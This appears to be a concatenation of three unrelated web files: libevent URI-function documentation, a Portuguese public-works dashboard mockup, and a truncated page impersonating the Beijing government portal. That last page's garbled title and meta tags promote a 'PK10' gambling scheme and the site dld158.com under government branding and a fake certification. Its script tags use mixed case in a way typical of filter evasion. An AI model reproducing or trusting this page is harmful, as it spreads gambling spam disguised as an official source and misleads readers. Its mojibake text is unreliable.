<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>query</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set the query of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or clear the query if query==NULL. The query should not include a leading "?". Returns 0 on success, -1 if query is not well-formed. </p>
</div>
</div>
<a class="anchor" id="abf5f82fb9c8f8df0b1b4c73691791dd5"></a><!-- doxytag: member="http.h::evhttp_uri_set_scheme" ref="abf5f82fb9c8f8df0b1b4c73691791dd5" args="(struct evhttp_uri *uri, const char *scheme)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#abf5f82fb9c8f8df0b1b4c73691791dd5">evhttp_uri_set_scheme</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>scheme</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set the scheme of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or clear the scheme if scheme==NULL. Returns 0 on success, -1 if scheme is not well-formed. </p>
</div>
</div>
<a class="anchor" id="ac7b10b8ef8ee94d14674f9329486d355"></a><!-- doxytag: member="http.h::evhttp_uri_set_userinfo" ref="ac7b10b8ef8ee94d14674f9329486d355" args="(struct evhttp_uri *uri, const char *userinfo)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#ac7b10b8ef8ee94d14674f9329486d355">evhttp_uri_set_userinfo</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>userinfo</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set the userinfo of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or clear the userinfo if userinfo==NULL. Returns 0 on success, -1 if userinfo is not well-formed. </p>
</div>
</div>
<a class="anchor" id="ac2914389616f04199aded10444fd8e42"></a><!-- doxytag: member="http.h::evhttp_uridecode" ref="ac2914389616f04199aded10444fd8e42" args="(const char *uri, int decode_plus, size_t *size_out)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">char* <a class="el" href="http_8h.html#ac2914389616f04199aded10444fd8e42">evhttp_uridecode</a> </td>
<td>(</td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">int </td>
<td class="paramname"><em>decode_plus</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">size_t * </td>
<td class="paramname"><em>size_out</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Helper function to decode a URI-escaped string or HTTP parameter.</p>
<p>If 'decode_plus' is 1, then we decode the string as an HTTP parameter value, and convert all plus ('+') characters to spaces. If 'decode_plus' is 0, we leave all plus characters unchanged.</p>
<p>The returned string must be freed by the caller.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">uri</td><td>a URI-encode encoded URI </td></tr>
<tr><td class="paramname">decode_plus</td><td>determines whether we convert '+' to sapce. </td></tr>
<tr><td class="paramname">size_out</td><td>if size_out is not NULL, *size_out is set to the size of the returned string </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>a newly allocated unencoded URI or NULL on failure </dd></dl>
</div>
</div>
<a class="anchor" id="ab64229249a981ccfea09161a199972da"></a><!-- doxytag: member="http.h::evhttp_uriencode" ref="ab64229249a981ccfea09161a199972da" args="(const char *str, ev_ssize_t size, int space_to_plus)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">char* <a class="el" href="http_8h.html#ab64229249a981ccfea09161a199972da">evhttp_uriencode</a> </td>
<td>(</td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>str</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">ev_ssize_t </td>
<td class="paramname"><em>size</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">int </td>
<td class="paramname"><em>space_to_plus</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>As evhttp_encode_uri, but if 'size' is nonnegative, treat the string as being 'size' bytes long. This allows you to encode strings that may contain 0-valued bytes.</p>
<p>The returned string must be freed by the caller.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">str</td><td>an unencoded string </td></tr>
<tr><td class="paramname">size</td><td>the length of the string to encode, or -1 if the string is NUL-terminated </td></tr>
<tr><td class="paramname">space_to_plus</td><td>if true, space characters in 'str' are encoded as +, not %20. </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>a newly allocate URI-encoded string, or NULL on failure. </dd></dl>
</div>
</div>
</div><!-- contents -->
<hr class="footer"/><address class="footer"><small>
Generated on Mon Nov 17 2014 22:16:07 for lldp by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.7.6.1
</small></address>
</body>
</html>
|
Web/todeolho/projects.html
|
brunosm08/AppToDeOlho
|
<!DOCTYPE html>
<html lang="pt">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- Meta, title, CSS, favicons, etc. -->
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>To de Olho</title>
<!-- Bootstrap core CSS -->
<link href="css/bootstrap.min.css" rel="stylesheet">
<link href="fonts/css/font-awesome.min.css" rel="stylesheet">
<link href="css/animate.min.css" rel="stylesheet">
<!-- Custom styling plus plugins -->
<link href="css/custom.css" rel="stylesheet">
<link href="css/icheck/flat/green.css" rel="stylesheet">
<script src="js/jquery.min.js"></script>
<!--[if lt IE 9]>
<script src="../assets/js/ie8-responsive-file-warning.js"></script>
<![endif]-->
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body class="nav-md">
<div class="container body">
<div class="main_container">
<div class="col-md-3 left_col">
<div class="left_col scroll-view">
<div class="navbar nav_title" style="border: 0;">
<a href="index.html" class="site_title"><img src="images/lupa-todeolho.png" width="40px"> Tô de
Olho</span></a>
</div>
<div class="clearfix"></div>
<!-- menu prile quick info -->
<div class="profile">
<div class="profile_pic">
<img src="images/img.jpg" alt="..." class="img-circle profile_img">
</div>
<div class="profile_info">
<span>Seja bem vindo,</span>
<h2>Administrador</h2>
</div>
</div>
<!-- /menu prile quick info -->
<br/>
<!-- sidebar menu -->
<div id="sidebar-menu" class="main_menu_side hidden-print main_menu">
<div class="menu_section">
<h3>Menu</h3>
<ul class="nav side-menu">
<li><a href="index.html"><i class="fa fa-home"></i> Início </a></li>
<li><a href="projects.html"><i class="fa fa-institution"></i> Obras </a></li>
<li><a href="denuncias.html"><i class="fa fa-bullhorn"></i> Denúncias
<span class="label label-success">+ 124</span></a>
</li>
<li><a href="usuarios.html"><i class="fa fa-users"></i> Usuários
<span class="label label-success">+ 439</span></a>
</li>
</ul>
</div>
</div>
<!-- /sidebar menu -->
<!-- /menu footer buttons -->
<div class="sidebar-footer hidden-small">
<a data-toggle="tooltip" data-placement="top" title="Settings">
<span class="glyphicon glyphicon-cog" aria-hidden="true"></span>
</a>
<a data-toggle="tooltip" data-placement="top" title="FullScreen">
<span class="glyphicon glyphicon-fullscreen" aria-hidden="true"></span>
</a>
<a data-toggle="tooltip" data-placement="top" title="Lock">
<span class="glyphicon glyphicon-eye-close" aria-hidden="true"></span>
</a>
<a data-toggle="tooltip" data-placement="top" title="Logout">
<span class="glyphicon glyphicon-off" aria-hidden="true"></span>
</a>
</div>
<!-- /menu footer buttons -->
</div>
</div>
<!-- top navigation -->
<div class="top_nav">
<div class="nav_menu">
<nav class="" role="navigation">
<div class="nav toggle">
<a id="menu_toggle"><i class="fa fa-bars"></i></a>
</div>
</nav>
</div>
</div>
<!-- /top navigation -->
<!-- page content -->
<div class="right_col" role="main">
<!-- top tiles -->
<div class="row top_tiles">
<div class="animated flipInY col-lg-3 col-md-3 col-sm-6 col-xs-12"
onclick="location.href='projects.html'">
<div class="tile-stats">
<div class="icon"><i class="fa fa-map-marker"></i>
</div>
<div class="count">125.312</div>
<h3>Obras</h3>
<p class="text-center"><i class="green"><i class="fa fa-sort-asc"></i> 2% </i> Último mês
</p>
</div>
</div>
<div class="animated flipInY col-lg-3 col-md-3 col-sm-6 col-xs-12"
onclick="location.href='denuncias.html'">
<div class="tile-stats">
<div class="icon"><i class="fa fa-search"></i>
</div>
<div class="count">640.589</div>
<h3>Interações</h3>
<p class="text-center">
<i class="green"> 17% </i> Contentes | <i class="red"> 71% </i> Aborrecidos
</p>
</div>
</div>
<div class="animated flipInY col-lg-3 col-md-3 col-sm-6 col-xs-12"
onclick="location.href='projects.html'">
<div class="tile-stats">
<div class="icon"><i class="fa fa-anchor"></i>
</div>
<div class="count">12.045</div>
<h3>Obras Paradas</h3>
<p class="text-center"><i class="red"><i class="fa fa-sort-desc"></i> 5% </i> Último mês
</p>
</div>
</div>
<div class="animated flipInY col-lg-3 col-md-3 col-sm-6 col-xs-12"
onclick="location.href='usuarios.html'">
<div class="tile-stats">
<div class="icon"><i class="fa fa-users"></i>
</div>
<div class="count">1.1 mi</div>
<h3>Usuários</h3>
<p class="text-center"><i class="green"><i class="fa fa-sort-asc"></i> 4,5% </i> Último
mês</p>
</div>
</div>
</div>
<!-- /top tiles -->
<div class="">
<div class="page-title">
<div class="title_left">
<h3>Obras
<small>Relação de Obras</small>
</h3>
</div>
<div class="title_right">
<div class="col-md-5 col-sm-5 col-xs-12 form-group pull-right top_search">
<div class="input-group">
<input type="text" class="form-control" placeholder="Procurando por...">
<span class="input-group-btn">
<button class="btn btn-default" type="button">Ok!</button>
</span>
</div>
</div>
</div>
</div>
<div class="clearfix"></div>
<div class="row">
<div class="col-md-12">
<div class="x_panel">
<div class="x_title">
<h2>Últimas</h2>
<ul class="nav navbar-right panel_toolbox">
<li><a class="collapse-link"><i class="fa fa-chevron-up"></i></a>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button"
aria-expanded="false"><i class="fa fa-wrench"></i></a>
<ul class="dropdown-menu" role="menu">
<li><a href="#">Settings 1</a>
</li>
<li><a href="#">Settings 2</a>
</li>
</ul>
</li>
<li><a class="close-link"><i class="fa fa-close"></i></a>
</li>
</ul>
<div class="clearfix"></div>
</div>
<div class="x_content">
<p>Relação de Obras/Progresso</p>
<!-- start project list -->
<table class="table table-striped projects">
<thead>
<tr>
<th style="width: 1%">#</th>
<th style="width: 20%">Obra</th>
<th>Responsáveis</th>
<th>Progresso</th>
<th>Categoria</th>
<th style="width: 20%">Edição</th>
</tr>
</thead>
<tbody>
<tr>
<td>#</td>
<td>
<a>Revitalização do São Francisco</a>
<br/>
<small>Iniciada em 01/02/2015</small>
</td>
<td>
<ul class="list-inline">
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
</ul>
</td>
<td class="project_progress">
<div class="progress progress_sm">
<div class="progress-bar bg-green" role="progressbar"
data-transitiongoal="57"></div>
</div>
<small>57% Complete</small>
</td>
<td>
<button type="button" class="btn btn-success btn-xs">Ambiental</button>
</td>
<td>
<a href="project_detail.html" class="btn btn-primary btn-xs"><i
class="fa fa-folder"></i> Ver
</a>
<a href="#" class="btn btn-info btn-xs"><i class="fa fa-pencil"></i> Editar
</a>
<a href="#" class="btn btn-danger btn-xs"><i class="fa fa-trash-o"></i>
Excluir </a>
</td>
</tr>
<tr>
<td>#</td>
<td>
<a>Construção de Linha Férrea/TO</a>
<br/>
<small>Iniciada em 01/01/2015</small>
</td>
<td>
<ul class="list-inline">
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
</ul>
</td>
<td class="project_progress">
<div class="progress progress_sm">
<div class="progress-bar bg-green" role="progressbar"
data-transitiongoal="47"></div>
</div>
<small>47% Complete</small>
</td>
<td>
<button type="button" class="btn btn-danger btn-xs">Transporte</button>
</td>
<td>
<a href="project_detail.html" class="btn btn-primary btn-xs"><i
class="fa fa-folder"></i> Ver
</a>
<a href="#" class="btn btn-info btn-xs"><i class="fa fa-pencil"></i> Editar
</a>
<a href="#" class="btn btn-danger btn-xs"><i class="fa fa-trash-o"></i>
Excluir </a>
</td>
</tr>
<tr>
<td>#</td>
<td>
<a>Construção do Hospital Geral de Palmas</a>
<br/>
<small>Iniciada em 01/01/2015</small>
</td>
<td>
<ul class="list-inline">
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
</ul>
</td>
<td class="project_progress">
<div class="progress progress_sm">
<div class="progress-bar bg-green" role="progressbar"
data-transitiongoal="77"></div>
</div>
<small>77% Complete</small>
</td>
<td>
<button type="button" class="btn btn-info btn-xs">Saúde</button>
</td>
<td>
<a href="project_detail.html" class="btn btn-primary btn-xs"><i
class="fa fa-folder"></i> Ver
</a>
<a href="#" class="btn btn-info btn-xs"><i class="fa fa-pencil"></i> Editar
</a>
<a href="#" class="btn btn-danger btn-xs"><i class="fa fa-trash-o"></i>
Excluir </a>
</td>
</tr>
<tr>
<td>#</td>
<td>
<a>Revitalização do Parque Ibirapuera</a>
<br/>
<small>Iniciada em 01/01/2015</small>
</td>
<td>
<ul class="list-inline">
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
</ul>
</td>
<td class="project_progress">
<div class="progress progress_sm">
<div class="progress-bar bg-green" role="progressbar"
data-transitiongoal="60"></div>
</div>
<small>60% Complete</small>
</td>
<td>
<button type="button" class="btn btn-success btn-xs">Ambiental</button>
</td>
<td>
<a href="project_detail.html" class="btn btn-primary btn-xs"><i
class="fa fa-folder"></i> Ver
</a>
<a href="#" class="btn btn-info btn-xs"><i class="fa fa-pencil"></i> Editar
</a>
<a href="#" class="btn btn-danger btn-xs"><i class="fa fa-trash-o"></i>
Excluir </a>
</td>
</tr>
<tr>
<td>#</td>
<td>
<a>Construção Quadra de Esportes</a>
<br/>
<small>Iniciada em 01/01/2015</small>
</td>
<td>
<ul class="list-inline">
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
</ul>
</td>
<td class="project_progress">
<div class="progress progress_sm">
<div class="progress-bar bg-green" role="progressbar"
data-transitiongoal="12"></div>
</div>
<small>12% Complete</small>
</td>
<td>
<button type="button" class="btn btn-warning btn-xs">Esporte</button>
</td>
<td>
<a href="project_detail.html" class="btn btn-primary btn-xs"><i
class="fa fa-folder"></i> Ver
</a>
<a href="#" class="btn btn-info btn-xs"><i class="fa fa-pencil"></i> Editar
</a>
<a href="#" class="btn btn-danger btn-xs"><i class="fa fa-trash-o"></i>
Excluir </a>
</td>
</tr>
<tr>
<td>#</td>
<td>
<a>Reforma Casa Prisão Provisória</a>
<br/>
<small>Iniciada em 01/012015</small>
</td>
<td>
<ul class="list-inline">
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
</ul>
</td>
<td class="project_progress">
<div class="progress progress_sm">
<div class="progress-bar bg-green" role="progressbar"
data-transitiongoal="35"></div>
</div>
<small>35% Complete</small>
</td>
<td>
<button type="button" class="btn btn-default btn-xs">Segurança</button>
</td>
<td>
<a href="project_detail.html" class="btn btn-primary btn-xs"><i
class="fa fa-folder"></i> Ver
</a>
<a href="#" class="btn btn-info btn-xs"><i class="fa fa-pencil"></i> Editar
</a>
<a href="#" class="btn btn-danger btn-xs"><i class="fa fa-trash-o"></i>
Excluir </a>
</td>
</tr>
<tr>
<td>#</td>
<td>
<a>Ponte sobre o Rio Taborda</a>
<br/>
<small>Iniciada em 01/01/2015</small>
</td>
<td>
<ul class="list-inline">
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
</ul>
</td>
<td class="project_progress">
<div class="progress progress_sm">
<div class="progress-bar bg-green" role="progressbar"
data-transitiongoal="87"></div>
</div>
<small>87% Complete</small>
</td>
<td>
<button type="button" class="btn btn-danger btn-xs">Transporte</button>
</td>
<td>
<a href="project_detail.html" class="btn btn-primary btn-xs"><i
class="fa fa-folder"></i> Ver
</a>
<a href="#" class="btn btn-info btn-xs"><i class="fa fa-pencil"></i> Editar
</a>
<a href="#" class="btn btn-danger btn-xs"><i class="fa fa-trash-o"></i>
Excluir </a>
</td>
</tr>
<tr>
<td>#</td>
<td>
<a>Construção de Pronto Atendimento</a>
<br/>
<small>Iniciada em 01/01/2015</small>
</td>
<td>
<ul class="list-inline">
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
</ul>
</td>
<td class="project_progress">
<div class="progress progress_sm">
<div class="progress-bar bg-green" role="progressbar"
data-transitiongoal="77"></div>
</div>
<small>77% Complete</small>
</td>
<td>
<button type="button" class="btn btn-info btn-xs">Saúde</button>
</td>
<td>
<a href="project_detail.html" class="btn btn-primary btn-xs"><i
class="fa fa-folder"></i> Ver
</a>
<a href="#" class="btn btn-info btn-xs"><i class="fa fa-pencil"></i> Editar
</a>
<a href="#" class="btn btn-danger btn-xs"><i class="fa fa-trash-o"></i>
Excluir </a>
</td>
</tr>
<tr>
<td>#</td>
<td>
<a>Contrução de Colégio Militar</a>
<br/>
<small>Iniciada em 01/01/2015</small>
</td>
<td>
<ul class="list-inline">
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
<li>
<img src="images/user.png" class="avatar" alt="Avatar">
</li>
</ul>
</td>
<td class="project_progress">
<div class="progress progress_sm">
<div class="progress-bar bg-green" role="progressbar"
data-transitiongoal="77"></div>
</div>
<small>77% Complete</small>
</td>
<td>
<button type="button" class="btn btn-primary btn-xs">Educação</button>
</td>
<td>
<a href="project_detail.html" class="btn btn-primary btn-xs"><i
class="fa fa-folder"></i> Ver
</a>
<a href="#" class="btn btn-info btn-xs"><i class="fa fa-pencil"></i> Editar
</a>
<a href="#" class="btn btn-danger btn-xs"><i class="fa fa-trash-o"></i>
Excluir </a>
</td>
</tr>
</tbody>
</table>
<!-- end project list -->
</div>
</div>
</div>
</div>
</div>
<!-- footer content -->
<footer>
<div class="copyright-info">
<p class="pull-right">Controladoria Geral da União <a href="http://www.cgu.gov.br/">CGU</a>
</p>
</div>
<div class="clearfix"></div>
</footer>
<!-- /footer content -->
</div>
<!-- /page content -->
</div>
</div>
<div id="custom_notifications" class="custom-notifications dsp_none">
<ul class="list-unstyled notifications clearfix" data-tabbed_notifications="notif-group">
</ul>
<div class="clearfix"></div>
<div id="notif-group" class="tabbed_notifications"></div>
</div>
<script src="js/bootstrap.min.js"></script>
<!-- bootstrap progress js -->
<script src="js/progressbar/bootstrap-progressbar.min.js"></script>
<script src="js/nicescroll/jquery.nicescroll.min.js"></script>
<!-- icheck -->
<script src="js/icheck/icheck.min.js"></script>
<script src="js/custom.js"></script>
<!-- pace -->
<script src="js/pace/pace.min.js"></script>
</body>
</html>
|
logs/meng/q5321793.html
|
ForAEdesWeb/AEW25
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible"content="IE=9; IE=8; IE=7; IE=EDGE">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="descRiPtion" content="±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®»¶Ó´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨" />
<title>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®_±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®-dld158ÓéÀÖ{°Ù¶ÈÐÂÎÅ}°Ù¶ÈÈÏÖ¤</title>
<!--ÈÈÁ¦Í¼¿ªÊ¼-->
<meta name="uctk" content="enabled">
<!--ÈÈÁ¦Í¼½áÊø-->
<meta name="keywords" content="±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®"/>
<meta name="descRiPtion" content="»¶Ó´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨"/>
<meta name="sitename" content="Ê×¶¼Ö®´°-±±¾©ÊÐÕþÎñÃÅ»§ÍøÕ¾">
<meta name="siteurl" content="http://www.beijing.gov.cn">
<meta name="district" content="±±¾©" >
<meta name="filetype" content="0">
<meta name="publishedtype" content="1">
<meta name="pagetype" content="2">
<meta name="subject" content="28428;1">
<!-- Le styles -->
<link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap150609.css" rel="stylesheet">
<link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap-responsive150609.css" rel="stylesheet">
<style>
body {
background:#E8E8E8; /* 60px to make the container go all the way to the bottom of the topbar */
}
.navbar .btn-navbar { position:absolute; right:0; margin-top:50px;}
#othermessage p {width:50%;}
#othermessage dl { width:50%;}
#breadcrumbnav ul { width:100%;}
#breadcrumbnav ul li { line-height:14px; font-family:"ËÎÌå"; padding:0px 10px; margin:0; background:none; }
#othermessage span { padding:0px 10px;}
#footer { margin:20px -20px 0px -20px;}
.navbar .nav li a { font-family:"Microsoft YaHei";}
#div_zhengwen { font-family:"SimSun";}
#div_zhengwen p{ font-family:"SimSun"; padding:0;}
select { width:75px; float:left; height:35px;}
.search .input{ border:1px solid #c1c1c1; width:290px;}
.bdsharebuttonbox { float:left; width:80%;}
.navbar .nav li a { padding: 10px 48px 11px 49px;}
.nav_weather span { float:right;}
#footer { position:absolute; left:0; right:0; margin:20px 0 0 0;}
#essaybottom {font-family:"simsun"; }
#pic { text-align:center; }
#pic ul { padding-top:10px; display:none; }
#pic li {font-family:"SimSun";}
.content_text h1 {line-height:150%;}
.version { float:right; padding:48px 50px 0 0}
.search { padding: 50px 0 0 70px;}
.nav_weather a { font-family:simsun;}
.version li a { font-family:simsun;}
.footer-class { font-family:simsun;}
@media only screen and (max-width: 480px)
{
#pic img { width:100%;}
}
@media only screen and (max-width: 320px)
{
#pic img { width:100%;}
}
@media only screen and (max-width: 640px)
{
#pic img { width:100%;}
}
#filerider .filelink {font-family:"SimSun";}
#filerider .filelink a:link { color:#0000ff; font-family:"SimSun";}
</style>
<scRiPt type="text/javascRiPt">
var pageName = "t1424135";
var pageExt = "htm";
var pageIndex = 0 + 1;
var pageCount = 1;
function getCurrentPage() {
document.write(pageIndex);
}
function generatePageList() {
for (i=0;i<1;i++) {
var curPage = i+1;
document.write('<option value=' + curPage);
if (curPage == pageIndex)
document.write(' selected');
document.write('>' + curPage + '</option>');
}
}
function preVious(n) {
if (pageIndex == 1) {
alert('ÒѾÊÇÊ×Ò³£¡');
} else {
getPageLocation(pageIndex-1);
}
}
function next(n) {
if (pageIndex == pageCount) {
alert('ÒѾÊÇβҳ£¡');
} else {
nextPage(pageIndex);
}
}
function nextPage(page) {
var gotoPage = "";
if (page == 0) {
gotoPage = pageName + "." + pageExt;
} else {
gotoPage = pageName + "_" + page + "." + pageExt;
}
location.href = gotoPage;
}
function getPageLocation(page) {
var gotoPage = "";
var tpage;
if (page == 1) {
gotoPage = pageName + "." + pageExt;
} else {
tpage=page-1;
gotoPage = pageName + "_" + tpage + "." + pageExt;
}
location.href = gotoPage;
}
</scRiPt>
<SCRIPT type=text/javascRiPt>
function $(xixi) {
return document.getElementById(xixi);
}
//ת»»×ÖºÅ
function doZoom(size){
if(size==12){
$("contentText").style.fontSize = size + "px";
$("fs12").style.display = "";
$("fs14").style.display = "none";
$("fs16").style.display = "none";
}
if(size==14){
$("contentText").style.fontSize = size + "px";
$("fs12").style.display = "none";
$("fs14").style.display = "";
$("fs16").style.display = "none";
}
if(size==16){
$("contentText").style.fontSize = size + "px";
$("fs12").style.display = "none";
$("fs14").style.display = "none";
$("fs16").style.display = "";
}
}
</SCRIPT>
<!-- Le HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
<scRiPt src="//html5shim.googlecode.com/svn/trunk/html5.js"></scRiPt>
<![endif]-->
<!-- Le fav and touch icons -->
<link rel="shortcut icon" href="images/favicon.ico">
<link rel="apple-touch-icon" href="images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="72x72" href="images/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="114x114" href="images/apple-touch-icon-114x114.png">
<scRiPt type="text/javascRiPt">
window.onload = function(){
var picurl = [
"",
"",
"",
"",
"",
"",
"",
"",
"",
""
];
var i=0;
for(i=0;i<picurl.length;i++)
{
picurl[i].index=i;
if(picurl[i]!="")
{
document.getElementById("pic_"+i).style.display = "block";
}
}
}
</scRiPt>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="nav_weather">
<div class="container"><a href="http://zhengwu.beijing.gov.cn/sld/swld/swsj/t1232150.htm" title="ÊÐί" target="_blank">ÊÐί</a> | <a href="http://www.bjrd.gov.cn/" title="ÊÐÈË´ó" target="_blank">ÊÐÈË´ó</a> | <a href="http://www.beijing.gov.cn/" title="ÊÐÕþ¸®" target="_blank">ÊÐÕþ¸®</a> | <a href="http://www.bjzx.gov.cn/" title="ÊÐÕþÐ" target="_blank">ÊÐÕþÐ</a></div>
</div>
<div class="container">
<a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</a>
<div class="span12">
<a class="brand" href="http://www.beijing.gov.cn/"><img src="http://www.beijing.gov.cn/images/zhuanti/xysym/logo.png" /></a>
<div class="search">
<scRiPt language="JavaScript" type="text/javascRiPt">
function checkForm(){
var temp = searchForm.temp.value;
var database = searchForm.database.value;
if(temp==null || temp==""){
alert("ÇëÊäÈëËÑË÷Ìõ¼þ");
}
else{
var url="http://so.beijing.gov.cn/Query?qt="+encodeURIComponent(temp)+"&database="+encodeURIComponent(database);
window.open(url);
}
return false;
}
</scRiPt>
<form id="search" method="get" name="searchForm" action="" target="_blank" onSubmit="return checkForm()">
<input type="hidden" value="bj" id="database" name="database" />
<input name="temp" id="keyword" type="text" value="È«ÎÄËÑË÷" class="input" title="È«ÎÄËÑË÷¹Ø¼ü×Ö" />
<input id="searchbutton" type="image" src="http://www.beijing.gov.cn/images/zhuanti/xysym/search_btn.gif" width="66" height="35" title="µã»÷ËÑË÷" alt="ËÑË÷" />
</form>
</div>
<div class="version"><ul>
<li><a title="ÎÞÕϰ" href="http://wza.beijing.gov.cn/" target="_blank" id="yx_style_nav">ÎÞÕϰ</a></li>
<li><a target="_blank" title="·±Ìå°æ" href="http://210.75.193.158/gate/big5/www.beijing.gov.cn">·±Ìå</a></li>
<li><a target="_blank" title="¼òÌå°æ" href="http://www.beijing.gov.cn">¼òÌå</a></li>
<li class="last"><a target="_blank" title="English Version" href="http://www.ebeijing.gov.cn">English</a></li></ul><ul>
<li><a href="javascRiPt:void(0)" onclick="SetHome(this,window.location)" title="ÉèΪÊ×Ò³">ÉèΪÊ×Ò³</a></li>
<li><a title="¼ÓÈëÊÕ²Ø" href="javascRiPt:void(0)" onclick="shoucang(document.title,window.location)">¼ÓÈëÊÕ²Ø</a></li>
<li class="last"><a target="_blank" title="ÒÆ¶¯°æ" href="http://www.beijing.gov.cn/sjbsy/">ÒÆ¶¯°æ</a></li></ul></div>
</div>
</div>
<div class="nav-collapse">
<div class="container">
<ul class="nav">
<li ><a href="http://www.beijing.gov.cn/" class="normal" title="Ê×Ò³">Ê×Ò³</a></li>
